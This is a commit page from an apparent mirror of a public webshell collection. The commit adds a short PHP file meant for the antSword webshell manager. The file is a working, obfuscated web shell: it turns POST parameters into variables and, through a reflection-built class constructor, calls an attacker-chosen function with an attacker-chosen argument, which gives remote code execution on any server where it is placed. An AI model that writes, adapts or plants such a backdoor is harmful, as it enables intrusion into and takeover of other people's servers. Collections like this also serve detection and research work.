mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
parent
98d73aa5e5
commit
5ab8c018a4
1 changed files with 21 additions and 0 deletions
21
antSword-shells/php1.php
Normal file
21
antSword-shells/php1.php
Normal file
|
@ -0,0 +1,21 @@
|
|||
<?php
|
||||
|
||||
class Test1
|
||||
{
|
||||
public function __construct($para, $_value)
|
||||
{
|
||||
$para($_value);
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
$class1 = new ReflectionClass("Test1");
|
||||
|
||||
foreach (array('_POST') as $_r1) {
|
||||
foreach ($$_r1 as $_asadasd=>$_wfwefb) {
|
||||
|
||||
$$_asadasd =$_wfwefb;
|
||||
}
|
||||
}
|
||||
|
||||
$class2 = $class1->newInstance($_asadasd, $$_asadasd);
|
Loading…
Reference in a new issue